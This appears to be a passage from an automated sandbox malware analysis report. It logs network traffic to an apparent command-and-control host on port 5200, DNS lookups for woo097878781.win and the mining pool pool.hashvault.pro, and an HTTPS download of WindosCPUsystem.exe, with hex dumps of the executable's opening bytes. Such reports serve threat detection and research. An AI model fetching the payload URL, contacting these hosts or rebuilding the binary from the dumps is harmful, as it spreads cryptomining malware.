                                                                          Dec 8, 2024 15:10:04.700920105 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:04.814857960 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:05.460238934 CET520050018185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:05.460441113 CET500185200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:05.581469059 CET520050018185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:05.700974941 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:05.814819098 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:06.159125090 CET520050018185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:06.159611940 CET500195200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:06.279030085 CET520050019185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:06.279233932 CET500195200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:06.279386044 CET500195200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:06.314783096 CET500185200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:06.398680925 CET520050019185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:06.700876951 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:06.814759970 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:07.717036009 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:07.814790010 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:08.133521080 CET520050019185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:08.133732080 CET500195200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:08.253067970 CET520050019185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:08.718307018 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:08.814841032 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:08.830529928 CET520050019185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:08.831166029 CET500205200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:08.892906904 CET500195200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:08.950618029 CET520050020185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:08.950877905 CET500205200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:08.950916052 CET500205200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:09.070295095 CET520050020185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:09.723987103 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:09.814781904 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:10.738883018 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:10.803417921 CET520050020185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:10.803591013 CET500205200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:10.814785004 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:10.923593998 CET520050020185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:11.501461983 CET520050020185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:11.580463886 CET500205200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:11.754681110 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:11.814811945 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:12.762665033 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:12.814817905 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:13.771589994 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:13.814794064 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:14.776354074 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:14.924176931 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:15.218851089 CET497733333192.168.2.637.203.243.102
                                                                          Dec 8, 2024 15:10:15.338396072 CET33334977337.203.243.102192.168.2.6
                                                                          Dec 8, 2024 15:10:15.659804106 CET33334977337.203.243.102192.168.2.6
                                                                          Dec 8, 2024 15:10:15.789052010 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:15.814855099 CET497733333192.168.2.637.203.243.102
                                                                          Dec 8, 2024 15:10:15.924180031 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:16.785188913 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:16.924175024 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:17.611709118 CET33334977337.203.243.102192.168.2.6
                                                                          Dec 8, 2024 15:10:17.786683083 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:17.814822912 CET497733333192.168.2.637.203.243.102
                                                                          Dec 8, 2024 15:10:17.924185038 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:18.788548946 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:18.924196005 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:19.793504953 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:19.924221039 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:20.805445910 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:21.017927885 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:21.809432030 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:22.017931938 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:22.810281038 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:23.017951965 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:23.819684029 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:24.017955065 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:24.821899891 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:25.017961979 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:25.932248116 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:26.127357960 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:26.941216946 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:27.127319098 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:27.952090025 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:28.127336025 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:28.971184969 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:29.127345085 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:29.970801115 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:30.102346897 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:30.983659029 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:31.118184090 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:31.996045113 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:32.082514048 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:33.005800962 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:33.127394915 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:34.026163101 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:34.125226974 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:34.364483118 CET50021443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:10:34.364522934 CET44350021154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:10:34.364594936 CET50021443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:10:34.372585058 CET50021443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:10:34.372600079 CET44350021154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:10:35.037605047 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:35.127401114 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:36.041966915 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:36.127382994 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:37.058079004 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:37.127441883 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:38.068953037 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:38.127388954 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:39.086860895 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:39.127373934 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:39.658318996 CET33334977337.203.243.102192.168.2.6
                                                                          Dec 8, 2024 15:10:39.814887047 CET497733333192.168.2.637.203.243.102
                                                                          Dec 8, 2024 15:10:40.093776941 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:40.314886093 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:41.107647896 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:41.314872980 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:41.813702106 CET44350021154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:10:41.815042973 CET50021443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:10:41.815057993 CET44350021154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:10:41.816117048 CET44350021154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:10:41.816214085 CET50021443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:10:41.818063021 CET50021443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:10:41.818135977 CET44350021154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:10:41.818217993 CET50021443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:10:41.818227053 CET44350021154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:10:41.818293095 CET50021443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:10:41.863347054 CET44350021154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:10:42.120996952 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:42.314893961 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:42.374172926 CET44350021154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:10:42.374259949 CET44350021154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:10:42.374332905 CET50021443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:10:42.377739906 CET50021443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:10:42.377752066 CET44350021154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:10:43.118530989 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:43.314961910 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:44.130611897 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:44.314870119 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:45.131211042 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:45.330521107 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:46.188922882 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:46.314904928 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:47.201932907 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:47.314891100 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:48.213200092 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:48.314888954 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:49.215241909 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:49.314982891 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:50.217817068 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:50.314898014 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:51.215512037 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:51.314927101 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:52.228943110 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:52.314951897 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:53.281121016 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:53.424351931 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:54.282658100 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:54.330682993 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:55.293175936 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:55.424290895 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:56.309956074 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:56.424412012 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:57.310029984 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:57.424428940 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:58.332385063 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:58.424346924 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:59.333733082 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:59.424354076 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:00.346745968 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:00.424310923 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:01.359802008 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:01.424324989 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:01.623574972 CET33334977337.203.243.102192.168.2.6
                                                                          Dec 8, 2024 15:11:01.814953089 CET497733333192.168.2.637.203.243.102
                                                                          Dec 8, 2024 15:11:02.366745949 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:02.424359083 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:03.377763033 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:03.424321890 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:04.386868954 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:04.627459049 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:05.401735067 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:05.518162966 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:06.412826061 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:06.627510071 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:07.420294046 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:07.627532959 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:08.420360088 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:08.627486944 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:09.297825098 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:09.297960043 CET500155200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:09.298002005 CET500185200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:09.298005104 CET500175200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:09.298005104 CET500195200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:09.298019886 CET500205200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:09.417932987 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:09.418021917 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:09.418718100 CET520050015185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:09.418766975 CET500155200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:09.418813944 CET520050018185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:09.418850899 CET520050017185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:09.418853045 CET500185200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:09.418899059 CET500175200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:09.418931007 CET520050020185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:09.418941975 CET520050019185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:09.418983936 CET500205200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:09.418994904 CET500195200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:13.388950109 CET500235200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:13.508637905 CET520050023185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:13.508733988 CET500235200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:13.508924007 CET500235200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:13.628278017 CET520050023185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:15.361413002 CET520050023185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:15.361596107 CET500235200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:15.486802101 CET520050023185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:16.063585043 CET520050023185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:16.063697100 CET500235200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:16.183371067 CET520050023185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:16.183485031 CET500235200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:16.303426027 CET520050023185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:17.202559948 CET520050023185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:17.202657938 CET500235200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:17.322174072 CET520050023185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:17.322252035 CET500235200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:17.441782951 CET520050023185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:18.338227987 CET520050023185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:18.518130064 CET500235200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:18.772299051 CET520050023185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:18.814981937 CET500235200192.168.2.6185.157.162.216

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 8, 2024 15:07:02.100255966 CET6342953192.168.2.61.1.1.1
                                                                          Dec 8, 2024 15:07:02.745273113 CET53634291.1.1.1192.168.2.6
                                                                          Dec 8, 2024 15:07:33.500243902 CET6419153192.168.2.61.1.1.1
                                                                          Dec 8, 2024 15:07:33.751643896 CET53641911.1.1.1192.168.2.6

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Dec 8, 2024 15:07:02.100255966 CET192.168.2.61.1.1.10xc6e4Standard query (0)woo097878781.winA (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 15:07:33.500243902 CET192.168.2.61.1.1.10x58b4Standard query (0)pool.hashvault.proA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Dec 8, 2024 15:07:02.745273113 CET1.1.1.1192.168.2.60xc6e4No error (0)woo097878781.win154.216.20.243A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 15:07:33.751643896 CET1.1.1.1192.168.2.60x58b4No error (0)pool.hashvault.pro5.188.137.200A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 15:07:33.751643896 CET1.1.1.1192.168.2.60x58b4No error (0)pool.hashvault.pro37.203.243.102A (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • woo097878781.win

                                                                          HTTPS Proxied Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.649738154.216.20.2434435020C:\Windows\explorer.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 14:07:25 UTC223OUTGET /WindosCPUsystem.exe HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept: */*
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                          Host: woo097878781.win
                                                                          2024-12-08 14:07:25 UTC275INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Sun, 08 Dec 2024 14:07:25 GMT
                                                                          Content-Type: application/x-msdos-program
                                                                          Content-Length: 2590208
                                                                          Last-Modified: Sat, 07 Dec 2024 18:58:16 GMT
                                                                          Connection: close
                                                                          ETag: "67549ac8-278600"
                                                                          X-Powered-By: PleskLin
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 14:07:25 UTC16109INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 07 00 b3 9a 54 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 7a 00 00 00 08 27 00 00 00 00 00 40 11 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 27 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00
                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEdTg"z'@@'`
                                                                          2024-12-08 14:07:25 UTC16384INData Raw: ce 00 00 00 66 0f 6f 05 b7 4d 00 00 66 0f 6f 15 bf 4b 27 00 66 0f fd d0 66 0f 6f 0d e3 4a 00 00 66 0f db d1 66 0f 7f 15 a7 4b 27 00 66 0f 6f 15 af 4b 27 00 66 0f fd d0 66 0f db d1 66 0f 7f 15 9f 4b 27 00 66 0f 6f 15 a7 4b 27 00 66 0f fd d0 66 0f db d1 66 0f 7f 15 97 4b 27 00 66 0f 6f 15 9f 4b 27 00 66 0f fd d0 66 0f db d1 66 0f 7f 15 8f 4b 27 00 66 0f 6f 15 97 4b 27 00 66 0f fd d0 66 0f db d1 66 0f 7f 15 87 4b 27 00 66 0f 6f 15 8f 4b 27 00 66 0f fd d0 66 0f db d1 66 0f 7f 15 7f 4b 27 00 66 0f fd 05 87 4b 27 00 66 0f db c1 66 0f 7f 05 7b 4b 27 00 8b 05 85 4b 27 00 83 c0 63 0f b6 c0 66 89 05 78 4b 27 00 c6 05 73 4b 27 00 00 80 3d 19 44 27 00 00 0f 84 1f 1e 00 00 80 3d 7f 4b 27 00 00 74 3a 66 0f 6f 05 63 4b 27 00 66 0f fd 05 cb 4c 00 00 66 0f db 05 03 4a 00
                                                                          Data Ascii: foMfoK'ffoJffK'foK'fffK'foK'fffK'foK'fffK'foK'fffK'foK'fffK'fK'ff{K'K'cfxK'sK'=D'=K't:focK'fLfJ
                                                                          2024-12-08 14:07:25 UTC16384INData Raw: 20 28 44 4f 4d 41 49 4e 29 00 41 72 67 75 6d 65 6e 74 20 73 69 6e 67 75 6c 61 72 69 74 79 20 28 53 49 47 4e 29 00 4f 76 65 72 66 6c 6f 77 20 72 61 6e 67 65 20 65 72 72 6f 72 20 28 4f 56 45 52 46 4c 4f 57 29 00 50 61 72 74 69 61 6c 20 6c 6f 73 73 20 6f 66 20 73 69 67 6e 69 66 69 63 61 6e 63 65 20 28 50 4c 4f 53 53 29 00 54 6f 74 61 6c 20 6c 6f 73 73 20 6f 66 20 73 69 67 6e 69 66 69 63 61 6e 63 65 20 28 54 4c 4f 53 53 29 00 54 68 65 20 72 65 73 75 6c 74 20 69 73 20 74 6f 6f 20 73 6d 61 6c 6c 20 74 6f 20 62 65 20 72 65 70 72 65 73 65 6e 74 65 64 20 28 55 4e 44 45 52 46 4c 4f 57 29 00 55 6e 6b 6e 6f 77 6e 20 65 72 72 6f 72 00 5f 6d 61 74 68 65 72 72 28 29 3a 20 25 73 20 69 6e 20 25 73 28 25 67 2c 20 25 67 29 20 20 28 72 65 74 76 61 6c 3d 25 67 29 0a 00 00 00
                                                                          Data Ascii: (DOMAIN)Argument singularity (SIGN)Overflow range error (OVERFLOW)Partial loss of significance (PLOSS)Total loss of significance (TLOSS)The result is too small to be represented (UNDERFLOW)Unknown error_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                          2024-12-08 14:07:26 UTC16384INData Raw: 3f 35 32 33 24 36 17 22 23 19 05 46 14 03 3a 08 0c 1d 45 20 26 07 04 33 20 3d 22 45 4f 14 30 4f 00 0f 04 0a 20 07 55 01 5a 37 1d 46 35 34 5e 18 3c 5a 15 22 29 1f 08 0d 45 16 5a 0a 3b 47 0e 2a 2e 29 46 24 30 14 0c 2a 0e 0b 23 3e 00 56 2b 18 1c 18 04 0c 27 1e 2a 29 45 1d 14 23 3a 07 3b 28 2c 0d 02 0e 41 05 57 01 1d 22 1e 3d 1f 09 5c 3e 07 3b 1b 2b 05 47 0d 33 3f 2a 38 0a 3d 1f 04 34 3a 2f 09 5b 3c 3a 26 1f 50 23 31 44 35 20 19 29 20 1b 45 08 08 34 59 36 39 33 1e 15 32 1a 26 3d 1d 34 21 21 3a 18 2a 3f 19 02 45 43 00 1a 07 03 03 00 47 0a 58 0a 1b 36 20 12 0d 1d 17 1a 59 41 20 0d 23 13 32 1c 4b 33 1d 14 59 2c 0b 38 06 1f 02 5a 02 3c 15 25 2b 17 30 16 3d 08 21 3d 2b 19 5f 29 02 21 2e 0a 06 1d 5a 24 1e 59 1c 37 04 48 06 1d 0a 00 00 35 20 0f 2a 0e 4c 38 08 39 1e
                                                                          Data Ascii: ?523$6"#F:E &3 ="EO0O UZ7F54^<Z")EZ;G*.)F$0*#>V+'*)E#:;(,AW"=\>;+G3?*8=4:/[<:&P#1D5 ) E4Y6932&=4!!:*?ECGX6 YA #2K3Y,8Z<%+0=!=+_)!.Z$Y7H5 *L89
                                                                          2024-12-08 14:07:26 UTC16384INData Raw: 01 51 09 26 52 5e 07 09 31 21 3f 2e 21 18 1f 49 1c 01 04 37 2c 16 1e 49 44 52 11 07 17 10 1b 36 2a 32 35 50 28 38 3e 21 2e 22 3e 1d 1f 59 26 18 22 48 1e 02 1f 28 1f 09 47 30 33 43 4a 35 11 3a 35 15 13 24 03 1e 36 29 2c 27 45 10 47 28 45 37 17 0b 3b 3d 01 1a 5d 20 0a 0b 43 3c 1d 2b 31 0f 3a 17 3c 2a 29 55 51 5c 03 05 0e 07 1f 2a 18 38 3a 5e 05 01 06 08 5e 31 3f 31 25 34 16 3a 11 20 0e 2e 49 26 0c 00 1d 3a 21 27 42 3b 3e 14 25 41 47 45 17 0a 5d 1a 2e 19 34 2c 46 21 12 37 1d 40 27 10 2b 0b 5d 22 1d 26 33 1d 13 22 01 38 27 14 3c 01 3b 05 1a 20 21 17 28 36 4d 1f 3b 43 19 35 07 1d 03 20 0c 0d 12 2c 0e 40 4f 07 07 00 2d 17 13 5a 14 0d 08 3b 0c 38 1d 38 42 16 2e 26 1a 19 07 38 05 30 38 14 1c 52 07 44 26 15 22 2c 39 40 3e 44 47 21 0d 3c 1e 31 38 3a 0c 43 00 21 59
                                                                          Data Ascii: Q&R^1!?.!I7,IDR6*25P(8>!.">Y&"H(G03CJ5:5$6),'EG(E7;=] C<+1:<*)UQ\*8:^^1?1%4: .I&:!'B;>%AGE].4,F!7@'+]"&3"8'<; !(6M;C5 ,@O-Z;88B.&808RD&",9@>DG!<18:C!Y
